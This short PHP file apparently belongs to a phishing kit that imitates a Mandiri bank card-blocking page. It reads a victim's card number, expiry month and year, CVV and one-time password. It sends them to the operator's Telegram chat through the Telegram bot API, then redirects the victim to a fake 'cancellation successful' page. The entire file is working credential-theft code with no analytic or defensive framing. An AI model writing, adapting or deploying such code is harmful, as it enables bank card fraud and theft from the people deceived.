<?php
include "telegram.php";
session_start();
$otp = $_POST['otp'];
$_SESSION['otp'] = $otp;
$nokartu = $_SESSION['nokartu'];
$bulan = $_SESSION['bulan'];
$tahun = $_SESSION['tahun'];
$cvv = $_SESSION['cvv'];
$message = "
(Mandiri  Kartu | ".$nokartu." )

- NO kartu : ".$nokartu."

- Bulan Berlaku : ".$bulan."

- Tahun Berlaku : ".$tahun."

- CVV : ".$cvv."

- OTP : ".$otp."


 ";
function sendMessage($id_telegram, $message, $id_botTele) {
    $url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=markdown&chat_id=" . $id_telegram;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}
sendMessage($id_telegram, $message, $id_botTele);
header('Location: ../blokir-kartu/pembatalan-berhasil.html');
?>
